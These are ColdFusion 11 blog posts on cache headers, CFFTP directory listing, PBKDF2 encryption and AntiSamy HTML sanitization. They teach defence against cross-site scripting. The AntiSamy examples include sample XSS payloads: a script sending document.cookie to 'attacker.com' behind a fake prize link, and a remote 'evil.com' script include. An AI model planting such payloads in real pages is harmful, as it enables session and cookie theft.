Monday, July 27, 2015

CF11 is setting cache-control and expires headers

We have received a few bug reports and customer cases where CF11 adds Cache-Control and Expires headers to the response, which causes problems for existing code.

We investigated and found that this happens only when the server is installed with the Development profile. In that profile we enable some server settings that are helpful when setting up an environment for development. The setting that causes this issue is Remote Inspection, which helps in debugging and inspecting the mobile applications generated by ColdFusion.


It is recommended to use the Production profile or the Production Secure profile when installing CF for production environments. With those profiles this setting is not enabled and its respective web.xml filters are disabled. Even so, some teams run regression tests in a development environment, and this feature might cause those test cases to fail.

Enabling this feature adds cache-control headers to each and every CF response. This issue needs to be fixed, but for now you can disable the feature in your development environment by unchecking Allow Remote Inspection. The setting can be found at Debugging & Logging -> Remote Inspection in the CF Administrator. Optionally, you can also disable the feature in web.xml by commenting out the remote inspection J2EE filter. With the filter commented out in web.xml, the feature stays off even if someone accidentally re-enables the setting in the Administrator.



Thanks,
Pavan Kumar.

CFFTP listdir fails when SYST command is disabled on remote FTP server

In this article we discuss an issue that prevents CFFTP from displaying the list of folders and files retrieved from an FTP server when the SYST command is disabled on that server.

Let's look at why this happens. To list directories and files (action="listdir") on the remote FTP server, CFFTP issues the FTP LIST command. The remote server executes it and sends the directory listing back in the response. Once CFFTP receives the response, it needs to parse it and represent it as a listing. But how the response should be parsed depends on the file list layout style of the remote FTP server. FTP exposes this information through the SYST command, and CFFTP uses it to decide how to parse the listing response.

Many FTP servers disable the SYST command because it reveals information about the server and its OS type. In that case the listing request fails. There is a way to avoid calling SYST: the JVM flag org.apache.commons.net.ftp.systemType. If this flag is set to a value that specifies how to parse the LIST response, SYST is not invoked and parsing happens as specified by the flag. However, the flag applies to the whole JVM. If a CF instance connects to multiple remote FTP servers hosted on different operating systems, none of which allow SYST, a single flag value results in errors for some of them. This led us to add a new attribute to the CFFTP tag.
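As a rough illustration, the flag is passed to the JVM as a system property. The fragment below assumes a standard ColdFusion 11 install where the JVM arguments live on the java.args line of cfusion/bin/jvm.config; the placeholder stands for whatever arguments you already have, and the server needs a restart for the change to take effect.

```properties
# cfusion/bin/jvm.config (excerpt)
# Keep your existing arguments and append the -D flag at the end.
java.args=<your existing arguments> -Dorg.apache.commons.net.ftp.systemType=WINDOWS
```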

A new attribute called systemType has been added to the CFFTP tag. It specifies how to parse the file list response without invoking the SYST command. This attribute is available from CF11 Update 3.

Possible values for the attribute are as follows (the same values also apply to the JVM flag):
     WINDOWS: CFFTP treats the response as a Windows-style directory listing
     UNIX: CFFTP treats the response as a Unix-style directory listing
     The name of any class that implements org.apache.commons.net.ftp.FTPFileEntryParser

The attribute can be set at two levels: when opening the connection, or on an individual FTP operation such as listdir. If it is set on a named FTP connection, that systemType is used for all FTP operations on the connection where systemType is left unspecified.

Let's take a look at an example. For this example I am using the IIS FTP server with the SYST command disabled, as shown in the screenshot.


I then ran the script below to retrieve the file listing from this FTP server.
<cfscript>
ftpService = new ftp(server = "localhost", username = "pavan", password="P##$a12$3", connection="myconn"); // a literal # in a CFML string is written as ##
files = ftpService.listdir(directory="/", connection="myconn", name="files");
writeDump(files);
files = ftpService.listdir(directory="/sample", connection="myconn", name="files");
writeDump(files);
</cfscript> 
Running the above script throws an error saying that the remote FTP server does not allow the SYST command.



To fix this, add the systemtype attribute to the listdir operation and run the example again.
<cfscript>
ftpService = new ftp(server = "localhost", username = "pavan", password="P##$a12$3", connection="myconn");
files = ftpService.listdir(directory="/", connection="myconn", name="files", systemtype = "WINDOWS");
writeDump(files);
files = ftpService.listdir(directory="/sample", connection="myconn", name="files", systemtype = "WINDOWS");
writeDump(files);
</cfscript>
Now the script executes successfully and returns the listing.

This code can be simplified further by specifying the systemtype at the named connection level, so there is no need to specify it on each listdir operation.

<cfscript>
ftpService = new ftp(server = "localhost", username = "pavan", password="P##$a12$3", connection="myconn", systemtype = "WINDOWS");
files = ftpService.listdir(directory="/", connection="myconn", name="files");
writeDump(files);
files = ftpService.listdir(directory="/sample", connection="myconn", name="files");
writeDump(files);
</cfscript>
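
Since systemType is an attribute of the CFFTP tag, the same connection-level setting can presumably be written in tag form as well. The following is a minimal sketch, not taken from a tested setup: the ftpUser and ftpPassword variables are hypothetical placeholders for your own credentials, and the server and connection names are reused from the script examples.

```cfml
<!--- Hypothetical placeholders; replace with your own credentials --->
<cfset ftpUser = "your-user">
<cfset ftpPassword = "your-password">

<!--- Open a named connection and tell CFFTP how to parse listings, so SYST is not needed --->
<cfftp action="open" connection="myconn" server="localhost"
       username="#ftpUser#" password="#ftpPassword#"
       systemType="WINDOWS" stopOnError="yes">

<!--- No systemType here: the value from the named connection is used --->
<cfftp action="listdir" connection="myconn" directory="/" name="files">
<cfdump var="#files#">

<cfftp action="close" connection="myconn">
```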
Here is the order in which CFFTP looks for the system type:
1) It checks whether a systemtype is specified on the tag/script call. If found, it is used for parsing.
2) Otherwise it looks at the JVM flag org.apache.commons.net.ftp.systemType. If a value is specified, it is used.
3) As a last resort it invokes the SYST command. If the SYST command is unsuccessful the listing fails; otherwise the listing succeeds.
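
When debugging, it can help to see which of these sources would apply on a given server. The sketch below mirrors the lookup order in a small helper; resolveSystemType is a hypothetical function written for illustration and is not CFFTP's actual implementation. It only reads the JVM system property through java.lang.System.

```cfml
<cfscript>
// Hypothetical helper that mirrors the documented lookup order.
// Returns the system type that would be used, or "" when CFFTP would fall back to SYST.
string function resolveSystemType(string tagValue = "") {
    // 1) A systemType given on the tag/script call wins.
    if (len(trim(arguments.tagValue))) {
        return trim(arguments.tagValue);
    }
    // 2) Otherwise use the JVM flag, if it is set.
    var jvmValue = createObject("java", "java.lang.System")
        .getProperty("org.apache.commons.net.ftp.systemType");
    if (!isNull(jvmValue) && len(trim(jvmValue))) {
        return trim(jvmValue);
    }
    // 3) Nothing configured: the server would be asked via SYST.
    return "";
}

writeOutput("Tag level value given: " & resolveSystemType("WINDOWS") & "<br>");
writeOutput("No tag level value: " & resolveSystemType() & "<br>");
</cfscript>
```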

Thanks,
Pavan Kumar.


Wednesday, April 9, 2014

Password Based Encryption using PBKDF2 with ColdFusion 11

In this article we discuss password based encryption and some of its standards, along with how to apply password based encryption using ColdFusion 11. If you are already familiar with password based encryption and the PBKDF standard, skip ahead to the section ColdFusion 11 & PBKDF2.

Why Password Based Encryption (PBE) is Needed


Cryptography protects data from being viewed or modified and provides a secure means of communication over otherwise insecure channels. In cryptography, encryption is the process of converting data from plain text into a form called ciphertext, which cannot be easily understood by unauthorized parties. Decryption is the reverse process, where the ciphertext is converted back to the original plain text. Encryption is usually carried out using an encryption algorithm together with an encryption key, which determines how the ciphertext is generated from the plain text. Decryption is carried out using the same algorithm with the decryption key to transform the ciphertext back to its original plain text. In symmetric encryption the encryption and decryption keys are the same, whereas in asymmetric encryption they are different. This article is concerned with symmetric cryptography, where both keys are the same.

It is very difficult to decrypt the ciphertext without access to these keys, so the secrecy of communication depends on how well the keys are secured and managed. Successful key management is critical to the security of a cryptosystem. Generally the encryption/decryption keys are generated randomly using key-generation algorithms. Keys are usually long random strings of bits, and it cannot be expected that someone will actually remember them, let alone enter them using an onscreen keyboard. Because of this, keys must be kept in a safe and secure storage location. Users, on the other hand, are quite familiar with passwords. So we need a way to generate strong cryptographic keys from humanly manageable passwords. Also, key sizes vary between encryption algorithms, so we need a way to generate keys of the desired size from a given password.

Password based key derivation is not limited to encryption algorithms. It can also be used with message authentication code (MAC) algorithms, where the MAC generation operation produces a message authentication code from a message using a key, and the MAC verification operation verifies the message authentication code using the same key.


What is PBKDF?


Passwords bring another problem, though. If a key is constructed directly from a password, an attacker can precompute the keys for an exhaustive list of likely passwords (called a dictionary) and use them to find the correct password quickly. A standard way to derive an encryption key from a password is defined in PKCS#5 (Public Key Cryptography Standard), published by RSA (the company).

The standard strengthens the generation of cryptographic keys from passwords using the following two techniques.

1) Salt: Using a salt while generating the encryption keys protects them against dictionary attacks. With a random salt, many different encryption keys can be derived from the same password, which forces an attacker to generate a new key table for each salt value and makes pre-computed table attacks much harder. The salt is used along with the password to derive the key. Unlike the password, the salt need not be kept secret, and it is often stored along with the encrypted data. The standard recommends a salt length of at least 64 bits (8 bytes). The salt needs to be generated using a pseudo random number generator (PRNG). It is also strongly recommended not to reuse the same salt value for multiple instances of encryption.

2) Iteration Count: The number of times the key derivation operation is performed before the resulting encryption key is returned. A large iteration count, such as 1000 or more, makes the key derivation computationally expensive and deliberately slows down the process of getting from a password to an actual encryption/decryption key. In cryptography this technique is called key stretching. The minimum recommended number of iterations is 1000.

PKCS#5 defines two key derivation functions, PBKDF1 and PBKDF2. PBKDF stands for password based key derivation function. PBKDF1 applies a hash function (MD5 or SHA-1) multiple times to the salt and password, feeding the output of each round to the next one to produce the final output. The length of the final key is thus bound by the hash function output length (16 bytes for MD5, 20 bytes for SHA-1). PBKDF1 was originally designed for DES, and its 16 or 20 byte output was enough to derive both a key (56 bits) and an initialization vector (64 bits) to encrypt in CBC mode. However, since this is not enough for algorithms with longer keys such as 3DES and AES, PBKDF1 shouldn't be used and is left in the standard only for backward compatibility.

PBKDF2 doesn't suffer from the limitations of PBKDF1: it can produce keys of arbitrary length by generating as many blocks as needed to construct the key. To generate each block, a pseudo-random function keyed with the password is first applied to the concatenation of the salt and the block index, then applied repeatedly to its own output, and the intermediate results are XORed together. The pseudo-random function is configurable, but in practice HMAC-SHA1/256/384/512 are used, with HMAC-SHA1 being the most common. Even with all of this in place, a restrictive password policy further improves the security of the cryptosystem.
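
For reference, the block construction can be written out as follows. This restates the definition in RFC 2898 (listed in the references), with P the password, S the salt, c the iteration count, and dkLen and hLen the lengths in bytes of the derived key and of the pseudo-random function output.

```latex
\begin{align*}
DK  &= T_1 \,\|\, T_2 \,\|\, \cdots \,\|\, T_{\ell}, \qquad \ell = \lceil dkLen / hLen \rceil \\
T_i &= U_1 \oplus U_2 \oplus \cdots \oplus U_c \\
U_1 &= \mathrm{PRF}\bigl(P,\; S \,\|\, \mathrm{INT}(i)\bigr) \\
U_j &= \mathrm{PRF}\bigl(P,\; U_{j-1}\bigr), \qquad 2 \le j \le c
\end{align*}
```

Here INT(i) is the block index encoded as a four-byte big-endian integer, and DK is truncated to dkLen bytes.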

In general, the PBKDF standard can be used in both “password privacy” and “password integrity” modes. The password privacy mode generates a secret key for encryption, and the password integrity mode generates a Message Authentication Code (MAC) key.

ColdFusion 11 & PBKDF2


ColdFusion 11 adds a new function, GeneratePBKDFKey, for deriving an encryption key from a given input string. The function takes the algorithm, password, salt, iteration count and key size as arguments and returns an encryption key of the desired length. Each encryption algorithm has its own key sizes, so generate a key of the required size from the password using this function and then use that key in ColdFusion's encrypt and decrypt functions. The syntax of the function is as follows.
GeneratePBKDFKey(String algorithm, String inputString, String salt, int iterations, int keysize)
Function Arguments:

algorithm
The algorithm used to generate the encryption key. Supported algorithms are PBKDF2WithHmacSHA1, PBKDF2WithSHA1, PBKDF2WithSHA224, PBKDF2WithSHA256, PBKDF2WithSHA384, PBKDF2WithSHA512
inputString
The input string (password/pass-phrase) from which the encryption key is derived.
salt
Random cryptographic salt. The recommended length is at least 64 bits (8 bytes), and it must be randomly generated using a pseudo random number generator.
iterations
The number of iterations to perform. The minimum recommended number of iterations is 1000.
keySize
The desired key length in bits.
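
As a quick illustration of the call on its own, here is a minimal sketch that derives a key and round-trips a string through encrypt and decrypt. The password, salt and plain text are made-up sample values, and a 128 bit key is assumed only because AES accepts it on any JVM (older JVMs may need the unlimited strength policy files for larger AES keys).

```cfml
<cfscript>
// Sample values for illustration only; never hardcode real passwords or salts.
password   = "correct horse battery staple";
salt       = "A1b2C3d4E5f6G7h8"; // in practice, generate a random salt per user
iterations = 4096;
keySize    = 128;                // in bits

// Derive the key from the password.
derivedKey = generatePBKDFKey("PBKDF2WithHmacSHA1", password, salt, iterations, keySize);

// Use the derived key with the regular encrypt/decrypt functions.
cipherText = encrypt("some private data", derivedKey, "AES", "BASE64");
plainText  = decrypt(cipherText, derivedKey, "AES", "BASE64");

writeOutput(plainText);
</cfscript>
```

Deriving the key again with the same password, salt, iteration count and key size yields the same key, which is what makes decryption possible without storing the key itself.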

Example:


Here is a simple use case that puts PBKDF to work in ColdFusion. Many websites gather private information such as email address, phone numbers and postal address when a user creates an account, and store it in their data store. If the underlying data store is compromised, all of that information is leaked. One defence is to encrypt all personal information with a single encryption key that is stored somewhere other than the data store. But if that key is stolen, the personal data is compromised as well. Instead, we can derive the encryption key from the user's login password and encrypt the user's personal data with it.

In this example we use AES with a 192 bit key to encrypt the user's email address, and the encryption key derived from the password is fed to the encryption process. When decrypting, the same key is derived again and fed to the decryption process to get the data back. In practice this can be any piece of data or any file we want to encrypt; I am just using an email address here. Before encrypting or decrypting, generate a salt for that user and store it in some data store. I have created a component (PBECrypto.cfc) that encrypts and decrypts the given data using the supplied password.

component
{
 // These settings are hardcoded for brevity; create a constructor to accept them instead
 This.iterations = 2000;
 This.desiredKeyLength = 192;
 This.pbkdfAlgorithm = "PBKDF2WithHmacSHA1";
 This.saltLength = 16;// 16 * 8 = 128 bit salt
 This.encryptionAlgorithm = "AES";
 This.outputEncoding = "BASE64";

 // Derive the encryption key from the given password and salt
 // Returns the derived key; the caller is responsible for storing the salt
 
 private string function generateEncryptionKey(required string password, required string salt)
 {
  if(Len(Trim(password)) != 0 && Len(Trim(salt)) != 0)
  {
   return generatePBKDFKey(This.pbkdfAlgorithm, Trim(password), Trim(salt), This.iterations, 
                           This.desiredKeyLength);
  }
  throw("Invalid Password or Salt");
 }
 
 public string function generateRandomSalt()
 {
  var lowerAlphabets = "abcdefghijklmnopqrstuvwxyz";
  var upperAlphabets = uCase(lowerAlphabets);
  var numbers = "0123456789";
  
  var saltSpace = lowerAlphabets & upperAlphabets & numbers;
  var salt = "";
  for(var i = 0; i < This.saltLength; i++)
  {
   salt = salt & saltSpace.charAt(RandRange(0, Len(saltSpace) - 1, "SHA1PRNG"));
  }
  return salt;
 }
 
 public string function encryptData(required string inputData, required string password, 
                                    required string salt)
 {
  var encryptionKey = generateEncryptionKey(password, salt);
  return encrypt(inputData, encryptionKey, This.encryptionAlgorithm, This.outputEncoding);
 }
 
 public string function decryptData(required string encryptedData, required string password, 
                                    required string salt)
 {
  // regenerate the encryption key to decrypt the data
  var decryptionKey = generateEncryptionKey(password, salt);
  return decrypt(encryptedData, decryptionKey, This.encryptionAlgorithm, This.outputEncoding);
 }
 
}
The following code snippet uses PBECrypto.cfc to encrypt an email address using the password received from a form. Before encrypting, a salt must be generated for use with PBKDF2.
        
<cfscript>
 crypto = new PBECrypto();
 salt = crypto.generateRandomSalt();
 // Add your own logic to store the salt specific to the user.
 // Also assuming password & email address are received over a form from the user
 encryptedEmailAddress = crypto.encryptData(form.emailAddress, form.password, salt);
 // Store the encrypted email address in the store.
</cfscript>

Now we can decrypt the email address at any time, provided the user supplies the password. The snippet below does that.
<cfscript>
 // get the encrypted mail address and salt from the data store
 crypto = new PBECrypto();
 // Assuming the password is received over a form from the user
 emailAddress = crypto.decryptData(encryptedEmailAddress, form.password,salt);
</cfscript>

In this way PBKDF makes it possible to encrypt and decrypt without storing the encryption keys, by deriving them from a given input string (the password). Remember to use a sufficiently long, randomly generated salt and a high iteration count when deriving the key from the password.

References:
http://csrc.nist.gov/publications/nistpubs/800-132/nist-sp800-132.pdf
http://tools.ietf.org/html/rfc2898
http://en.wikipedia.org/wiki/PBKDF2

Using Antisamy Framework with ColdFusion 11

AntiSamy is an OWASP API for sanitizing HTML/CSS input. ColdFusion 11 provides HTML/CSS sanitization functions that do their job based on a given AntiSamy policy file. If you are familiar with the AntiSamy framework, skip to the section Integration with ColdFusion.

Need for AntiSamy:

Cross-site scripting (XSS) is one of the most common and prevalent security vulnerabilities found in web applications. XSS exploits vulnerabilities in the web application code that allow an attacker to inject malicious code (JavaScript) and execute it in the end user's browser. Some of the serious threats posed by XSS include session hijacking by stealing authentication information such as cookies, stealing sensitive data loaded in the web page, and performing operations on behalf of the victim.

XSS vulnerabilities can be classified into three types. First, DOM based XSS, which exists in the client's web page. Second, Non-Persistent or Reflected XSS, where the malicious input supplied is displayed back on the screen after returning from the server. And finally the most dangerous kind, Persistent (also called Second Order or Stored) XSS, where the malicious data supplied is stored in persistent storage or a database. One of the primary causes of XSS is not having proper validation/escaping mechanisms in place. To defend against such attacks, several encoding/escaping mechanisms need to be used depending on where the input is placed in the HTML. ColdFusion provides several encoding/escaping functions which help in handling the input and prevent many forms of XSS.

On many websites, application developers wish to let users post HTML markup so that they can post formatted and interactive content. In that case encoding/escaping cannot be performed on the posted HTML markup, as the input needs to be rendered in the browser. Forums and blogs are places where content posted by one user is displayed to other users of the website. Not encoding/escaping this unverified input definitely opens up new possibilities for XSS. One option is to use markup languages such as BBCode and WikiText, which provide an alternate set of markup tags similar to HTML. Their parsers convert these tags to equivalent HTML. These parsers can effectively whitelist the allowed formatting tags, but with this approach we cannot leverage HTML, and users are forced to learn a new language.

One last option could be to devise an XSD schema file defining the list of allowed HTML tags and attributes, convert all the given HTML input to XML, and then verify the XML using the XSD schema file. This provides a flexible implementation with whitelisting of tags. But the problem with XSD schema validation is that it provides no response or error message to the user, and the XSD needs to be created for all HTML elements.

AntiSamy Framework:

AntiSamy solves the problem of allowing HTML content while protecting the application from attacks like XSS. It is a framework that can sanitize/validate input markup containing HTML and CSS according to a given policy file. AntiSamy is an OWASP open source API that allows user submitted HTML/CSS while limiting the potentially malicious content that gets through. AntiSamy follows the whitelist approach to produce clean HTML/CSS output markup. It also provides user friendly error messages to let the user know what HTML, validation or security errors existed.

An AntiSamy policy file is an XML file which defines a set of rules such as the following:

  • Which HTML tags need to be removed, filtered, validated or encoded.
  • Validation rules for HTML tag attribute values, written using regular expressions and constant values.
  • CSS parsing rules that validate each CSS property individually, written using regular expressions and constant values.

AntiSamy just validates/sanitizes the input according to the given policy file, so the protection always depends on how strictly the policy file is written. For more information on AntiSamy, visit the OWASP AntiSamy Project page https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project and check out the AntiSamy developer guide to understand policy files and how to define them according to your requirements.

AntiSamy uses NekoHTML and the given policy file to validate the given HTML/CSS input markup. NekoHTML is a simple HTML scanner and tag balancer that enables application programmers to parse HTML documents and access the information using standard XML interfaces. The parser can scan HTML files and "fix up" many common mistakes that human (and computer) authors make in writing HTML documents. NekoHTML adds missing parent elements, automatically closes elements with optional end tags, and can handle mismatched inline element tags. After reading the input using NekoHTML, AntiSamy builds a DOM tree out of it and then validates all of its nodes against the given policy file.

AntiSamy provides the following boilerplate policy files (they can be downloaded from the OWASP project page), which you can use and modify further to meet your project requirements.
  • antisamy-slashdot.xml - This policy file only allows strict text formatting, and may be a good choice if users are submitting HTML in a comment thread.
  • antisamy-ebay.xml – This policy file gives the user a little bit of freedom, and may be a good choice if users are submitting HTML for a large portion of a page.
  • antisamy-myspace.xml – This policy file gives the user a lot of freedom, and may be a good choice if users are submitting HTML for an entire page. 
  • antisamy-tinymce.xml - This policy file only allows text formatting, and may be a good choice if users are submitting HTML to be used in a blog post. 
  • antisamy-anythinggoes.xml – A very dangerous policy file, this will allow all HTML, CSS and JavaScript. You shouldn’t use this in production.

When to use AntiSamy:

If you are accepting plain text data from the user, use the ESAPI encoding functions provided by ColdFusion when displaying it in the web browser. ColdFusion provides the following functions for this purpose:

encodeForHTML, encodeForHTMLAttribute, encodeForCSS, encodeForJavaScript and encodeForURL
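
Which function to use depends on where the value ends up in the page. The sketch below shows three common contexts; the form field names and their default values are hypothetical and are defined with cfparam only so that the page runs on its own.

```cfml
<!--- Hypothetical form fields, defaulted here so the page runs on its own --->
<cfparam name="form.comment" default="<b>Nice post</b> <script>alert(1)</script>">
<cfparam name="form.nickname" default='Pavan" onmouseover="alert(1)'>
<cfparam name="form.query" default="cold fusion & xss">

<cfoutput>
  <!--- HTML body context --->
  <p>#encodeForHTML(form.comment)#</p>
  <!--- HTML attribute context --->
  <input type="text" name="nickname" value="#encodeForHTMLAttribute(form.nickname)#">
  <!--- URL parameter context --->
  <a href="search.cfm?q=#encodeForURL(form.query)#">Search again</a>
</cfoutput>
```

With encoding applied, the markup in these values is displayed as text rather than interpreted by the browser.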

If you accept HTML markup from the user, use the AntiSamy functions provided by ColdFusion 11. Before planning to use AntiSamy, think about which tags, attributes and CSS rules you need. Define the required regular expressions and constant literals for the allowed values of each attribute. If your requirement is close to one of the example policy files provided by AntiSamy, modify that file to meet your requirement. Devise the policy rules according to your requirements while keeping XSS in mind.

Integration with ColdFusion:

ColdFusion 11 adds new functions that can sanitize/validate input based on a given AntiSamy policy file. ColdFusion 11 ships a basic AntiSamy policy file which is fairly permissive. This policy file allows most HTML elements, and may be useful if users are submitting full HTML pages. Two functions, isSafeHTML and getSafeHTML, were added to work with AntiSamy policies.

isSafeHTML validates whether the provided input string conforms to the rules defined in the AntiSamy policy. getSafeHTML returns the clean HTML, or the policy violation errors (what went wrong with the input), as per the policy.
getSafeHTML(unsafeHTML [, policyFile [, throwOnError]])
isSafeHTML(unsafeHTML [, policyFile])
unsafeHTML
     The HTML input markup text to sanitize
policyFile (Optional)
     Specify the path to the AntiSamy policy file. The path can be absolute or relative to the Application.cfc.

throwOnError (Optional)
      If set to true and the given input violates the allowed HTML rules specified in the policy file, an exception is thrown. The exception message contains the list of violations raised by the input. If set to false, no exception is thrown and the HTML content is returned filtered and cleaned according to the policy rules. Defaults to false.

As you can see, the policy file argument is optional for these functions. An AntiSamy policy file can be specified at the function, application and server levels. The default server level AntiSamy policy file, antisamy-basic.xml, can be found at <CF_HOME>\lib\antisamy-basic.xml. To specify the policy file at the application level, set the application setting this.security.antisamypolicy to the location of the policy file. If no policy file location is supplied to the functions, ColdFusion checks whether a policy file is configured at the application level. If one is configured, it is used; otherwise the server level AntiSamy policy file is used.
Application.cfc
component
{
    this.security.antisamypolicy = "antisamy.xml"; // Path can be absolute or relative to the application cfc path.
}
Here is an example showing how to use these functions

Examples: 

In this example we use the policy file antisamy-slashdot.xml from OWASP. This policy strictly allows only the <b> <i> <p> <br> <a> <ol> <ul> <li> <dl> <dt> <dd> <em> <strong> <tt> <blockquote> <div> <ecode> <quote> tags, and no CSS is allowed. isSafeHTML validates the input according to the policy and returns true or false; getSafeHTML sanitizes the input by filtering out disallowed content and returns clean HTML markup. As these are examples I am using static text input, but when using these functions, replace it with the relevant form variables.

<cfset inputHTML = "<script>function geturl(){return 'http://attacker.com?cookie='+document.cookie;}</script><b>You have won an IPAD.</b><a href='javascript:geturl()'>Click here to cliam the prize</a>">


<!--- Example1 Check whether input is according to policy rules --->

<cfset isSafe = isSafeHTML(inputHTML, "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>

<!--- Example2 Check whether input is according to policy rules --->
<cfset anotherInput = "<div><b>Hello World!!</b><br/>lorem ipsum lorem ipsum</div>">

<cfset isSafe = isSafeHTML(anotherInput , "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>
<!--- Example 3: Get Safe HTML By filtering out invalid input using the server level policy antisamy-basic.xml when application level setting is not specified---> 

<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput> 
  Thanks for submitting the content #safeHTML# <br/> 
</cfoutput> 

<!--- Example 4: Get safe HTML, or the policy violation messages, with throwOnError set to true --->
<cftry>
  <cfset safeHTML = getSafeHTML(inputHTML, "C:\antisamy-slashdot.xml", true)>
  <cfoutput>
    Thanks for submitting the content #safeHTML# <br/>
  </cfoutput>
  <cfcatch type="application">
    <cfoutput>Invalid Input markup. Please correct the below errors then submit the input again <br/><br/>#cfcatch.details#</cfoutput>
  </cfcatch>
</cftry>
<!--- Example 5: shows how antisamy fixes up invalid HTML (end </p> tag is missing) --->
<cfset inputHTML = "<p>This is <b onclick='alert(bang!)'>so</b> cool!!<img src='http://example.com/logo.jpg'><script src='http://evil.com/attack.js'>">
<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput>#safeHTML#</cfoutput> 

The antisamy-slashdot policy is configured not to allow script tags or JavaScript execution from the href attribute of an anchor tag, so the first input is considered unsafe and isSafeHTML returns No in Example 1. In Example 2 the given input contains only div, b and br tags, which are allowed by the policy, so it returns Yes.

<!-- copied parts from the antisamy-slashdot.xml -->

<regexp name="onsiteURL" value="([\p{L}\p{N}\\/\.\?=\#&amp;;\-_~]+|\#(\w)+)"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*"/>

<regexp-list>
<regexp name="onsiteURL"/>
<regexp name="offsiteURL"/>
</regexp-list>

<tag-rules>
<!--  Tags related to JavaScript  -->
<tag action="remove" name="script"/>

<!--  Anchor and anchor related tags  -->
<tag action="validate" name="a">
<attribute name="href" onInvalid="filterTag"/>
</tag>
</tag-rules>

Example 3 shows how to get clean HTML by filtering out the violations as per the policy. Example 3 gives the output "Thanks for submitting the content You have won an IPAD. Click here to cliam the prize". The script tags were removed from the input. The anchor tag contained an invalid value in its href attribute, so the tag itself was filtered out while the content inside it was kept. As <b> tags are allowed, they were kept as is.

Example 4 shows how to get the user friendly policy violation messages using getSafeHTML. Example 4 gives the output "The script tag is not allowed for security reasons. This tag should not affect the display of the input. The a tag contained an attribute that we could not process. The href attribute had a value of "javascript:geturl()". This value could not be accepted for security reasons. We have chosen to filter the a tag in order to continue processing the input.". Example 5 shows how getSafeHTML fixes up invalid HTML. It gives the output "<p>This is <b>so</b> cool!!</p>", adding the missing end paragraph (p) tag.

Further Reading:

https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project

https://code.google.com/p/owaspantisamy/downloads/list
http://nekohtml.sourceforge.net/